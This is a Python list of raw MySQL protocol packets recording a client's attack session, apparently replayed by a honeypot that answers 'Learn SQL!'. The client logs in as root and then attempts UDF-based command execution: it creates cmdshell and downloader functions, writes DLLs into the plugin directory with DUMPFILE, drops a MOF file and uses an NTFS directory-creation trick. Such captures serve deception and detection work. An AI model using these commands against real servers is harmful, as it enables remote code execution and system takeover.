stream = [('out', b'4\x00\x00\x00\x0a5.7.16\x00\x00\x00\x12gaaaaaaaa\x00,\xa2!\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00            \x00'),
('in', b'&\x00\x00\x01\x85\xa2\x0f\x00\x00\x00\x00\x01\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00'),
('out', b'\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00'),
('in', b'!\x00\x00\x00\x03select @@version_comment limit 1'),
('out', b'\x01\x00\x00\x01\x01(\x00\x00\x02\x03def\xfb\xfb\xfb\x11@@version_comment\xfb\x0c!\x00K\x00\x00\x00\xfd\x01\x00\x00\x00\x00\xfb\x05\x00\x00\x03\xfe\x00\x00\x02\x00\x1e\x00\x00\x04\x1dMySQL Community Server (GPL)\x00\x05\x00\x00\x05\xfe\x00\x00\x02\x00'),
('in', b'6\x00\x00\x00\x03create function xpdl3 returns string soname \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03create function cmdshell returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03create function downloader returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27udf32.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27udf33.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03create function downloader returns string soname "udf32.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03create function downloader returns string soname "udf33.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xijin.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xijin.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'<\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xijin1.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'>\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xijin1.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'6\x00\x00\x00\x03CREATE FUNCTION shell RETURNS string SONAME \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshelv RETURNS string SONAME \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03create function cmdshell returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03create function downloader returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x12\x00\x00\x00\x03SELECT DATABASE()'),
('out', b'\x01\x00\x00\x01\x01!\x00\x00\x02\x03def\x00\x00\x00\x0aDATABASE()\x00\x0c!\x00"\x00\x00\x00\xfd\x01\x00\x00\x00\x00\xfb\x05\x00\x00\x03\xfe\x00\x00\x02\x00\x13\x00\x00\x04\x12information_schema\x05\x00\x00\x05\xfe\x00\x00\x02\x00'),
('in', b'\x06\x00\x00\x00\x02mysql'),
('out', b'\x19\x00\x00\x01\xff\x00\x00#     No such database'),
('in', b'\x17\x00\x00\x00\x03drop function cmdshell'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x19\x00\x00\x00\x03drop function downloader'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b':\x00\x00\x00\x03create function cmdshell returns string soname \x27boom.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'<\x00\x00\x00\x03create function downloader returns string soname \x27boom.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x17\x00\x00\x00\x03drop function cmdshell'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x19\x00\x00\x00\x03drop function my_udfdoor'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x18\x00\x00\x00\x03drop function do_system'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x12\x00\x00\x00\x03SELECT DATABASE()'),
('out', b'\x01\x00\x00\x01\x01!\x00\x00\x02\x03def\x00\x00\x00\x0aDATABASE()\x00\x0c!\x00"\x00\x00\x00\xfd\x01\x00\x00\x00\x00\xfb\x05\x00\x00\x03\xfe\x00\x00\x02\x00\x13\x00\x00\x04\x12information_schema\x05\x00\x00\x05\xfe\x00\x00\x02\x00'),
('in', b'\x06\x00\x00\x00\x02mysql'),
('out', b'\x19\x00\x00\x01\xff\x00\x00#     No such database'),
('in', b'\x1e\x00\x00\x00\x03drop table if exists tempMix4'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b'3\x00\x00\x00\x03create table if not exists tempMix4(data LONGBLOB)'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b'\x12\x00\x00\x00\x03SELECT DATABASE()'),
('out', b'\x01\x00\x00\x01\x01!\x00\x00\x02\x03def\x00\x00\x00\x0aDATABASE()\x00\x0c!\x00"\x00\x00\x00\xfd\x01\x00\x00\x00\x00\xfb\x05\x00\x00\x03\xfe\x00\x00\x02\x00\x13\x00\x00\x04\x12information_schema\x05\x00\x00\x05\xfe\x00\x00\x02\x00'),
('in', b'\x06\x00\x00\x00\x02mysql'),
('out', b'\x19\x00\x00\x01\xff\x00\x00#     No such database'),
('in', b'\x14\x00\x00\x00\x03drop table yongger3'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'%\x00\x00\x00\x03create table yongger3(data LONGBLOB)'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b' \x00\x00\x00\x03insert into yongger3 values("")'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b'\x1e\x00\x00\x00\x03update yongger3 set data = @a'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03select data from yongger3 into DUMPFILE "..\x5c\x5cbin\x5c\x5cnusql.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x5c\x00\x00\x00\x03set @dir2 = concat(\x27select data from yongger3 into DUMPFILE "\x27,@@plugin_dir,\x27\x5c\x5cnusql.dll"\x27)'),
('out', b'\x09\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00#2'),
('in', b'\x27\x00\x00\x00\x03set @dir2 = replace(@dir2,"\x5c\x5c","\x5c\x5c\x5c\x5c")'),
('out', b'\x09\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00#2'),
('in', b'&\x00\x00\x00\x03set @dir2 = replace(@dir2,"/","\x5c\x5c\x5c\x5c")'),
('out', b'\x09\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00#2'),
('in', b'1\x00\x00\x00\x03set @dir3 = replace(@dir2,"lib\x5c\x5c\x5c\x5cplugin","bin")'),
('out', b'\x09\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00#2'),
('in', b'\x18\x00\x00\x00\x03prepare sql3 from @dir2'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x0d\x00\x00\x00\x03execute sql3'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x18\x00\x00\x00\x03prepare sql2 from @dir3'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x0d\x00\x00\x00\x03execute sql2'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x14\x00\x00\x00\x03drop FUNCTION xpdl3'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'8\x00\x00\x00\x03CREATE FUNCTION xpdl3 RETURNS STRING SONAME \x27nusql.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'$\x00\x00\x00\x03create table temp_mix(abc longblob)'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b'=\x00\x00\x00\x03insert into temp_mix values(load_file(\xa1\xafC:\x5c\x5cweb\x5c\x5cudf.dll\xa1\xaf))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03insert into temp_mix values(load_file(\xa1\xafD:\x5c\x5cweb\x5c\x5cudf.dll\xa1\xaf))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03insert into temp_mix values(load_file(\xa1\xafE:\x5c\x5cweb\x5c\x5cudf.dll\xa1\xaf))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03insert into temp_mix values(load_file(\xa1\xafF:\x5c\x5cweb\x5c\x5cudf.dll\xa1\xaf))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03select * from temp_mix into dumpfile \xa1\xafC:\x5c\x5cWindows\x5c\x5csystem32\x5c\x5cudf.dll\xa1\xaf'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03select * from temp_mix into dumpfile \xa1\xafD:\x5c\x5cWindows\x5c\x5csystem32\x5c\x5cudf.dll\xa1\xaf'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03select * from temp_mix into dumpfile \xa1\xafE:\x5c\x5cWindows\x5c\x5csystem32\x5c\x5cudf.dll\xa1\xaf'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03select * from temp_mix into dumpfile \xa1\xafF:\x5c\x5cWindows\x5c\x5csystem32\x5c\x5cudf.dll\xa1\xaf'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'8\x00\x00\x00\x03create function MyCmd returns string soname \xa1\xafudf.dll\xa1\xaf'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\xed\x01\x00\x00\x03select load_file(\x27C:/wmpub/nullevt.mof\x27) into dumpfile \x27c:/windows/system32/wbem/mof/nullevt.mof\x27\x0aselect load_file(\x27D:/wmpub/nullevt.mof\x27) into dumpfile \x27c:/windows/system32/wbem/mof/nullevt.mof\x27\x0aselect load_file(\x27E:/wmpub/nullevt.mof\x27) into dumpfile \x27c:/windows/system32/wbem/mof/nullevt.mof\x27\x0aselect load_file(\x27F:/wmpub/nullevt.mof\x27) into dumpfile \x27c:/windows/system32/wbem/mof/nullevt.mof\x27\x0aselect \x27It is dll\x27into dumpfile \x27C:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.1\x5c\x5clib::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'e\x00\x00\x00\x03select \x27It is dll\x27into dumpfile \x27D:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.1\x5c\x5clib::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'e\x00\x00\x00\x03select \x27It is dll\x27into dumpfile \x27E:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.1\x5c\x5clib::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'e\x00\x00\x00\x03select \x27It is dll\x27into dumpfile \x27F:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.1\x5c\x5clib::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'm\x00\x00\x00\x03select \x27It is dll\x27into dumpfile \x27C:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.1\x5c\x5clib\x5c\x5cplugin::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'm\x00\x00\x00\x03select \x27It is dll\x27into dumpfile \x27D:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.1\x5c\x5clib\x5c\x5cplugin::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'm\x00\x00\x00\x03select \x27It is dll\x27into dumpfile \x27E:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.1\x5c\x5clib\x5c\x5cplugin::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'm\x00\x00\x00\x03select \x27It is dll\x27into dumpfile \x27F:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.1\x5c\x5clib\x5c\x5cplugin::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'&\x00\x00\x00\x03create table testshell (cmd LONGBLOB)'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b'\x85\x00\x00\x00\x03insert into testshell (cmd) values (hex(load_file(\x27C:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.0\x5c\x5cLib\x5c\x5cPlugin\x0a\x5clib_mysqludf_sys.dll\x27)))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x85\x00\x00\x00\x03insert into testshell (cmd) values (hex(load_file(\x27D:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.0\x5c\x5cLib\x5c\x5cPlugin\x0a\x5clib_mysqludf_sys.dll\x27)))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x85\x00\x00\x00\x03insert into testshell (cmd) values (hex(load_file(\x27E:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.0\x5c\x5cLib\x5c\x5cPlugin\x0a\x5clib_mysqludf_sys.dll\x27)))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x85\x00\x00\x00\x03insert into testshell (cmd) values (hex(load_file(\x27F:\x5c\x5cProgram Files\x5c\x5cMySQL\x5c\x5cMySQL Server 5.0\x5c\x5cLib\x5c\x5cPlugin\x0a\x5clib_mysqludf_sys.dll\x27)))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'.\x00\x00\x00\x03Drop FUNCTION IF EXISTS lib_mysqludf_sys_info'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b' \x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_get'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b' \x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_set'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_exec'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_eval'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS cmdshell'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'#\x00\x00\x00\x03Drop FUNCTION IF EXISTS downloader'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x1e\x00\x00\x00\x03Drop FUNCTION IF EXISTS shell'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x05\x00\x00\x00\x03exit'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x01\x00\x00\x00\x01')]